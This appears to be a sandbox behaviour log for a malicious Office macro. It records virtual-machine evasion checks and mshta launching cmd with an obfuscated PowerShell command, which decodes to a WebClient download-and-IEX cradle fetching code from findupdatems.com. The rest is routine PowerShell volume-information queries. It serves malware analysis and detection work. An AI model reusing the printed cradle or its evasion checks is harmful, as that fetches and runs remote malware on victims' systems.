Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmware") | Name: KYEPC270 |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Tracing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.Tracing.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation | |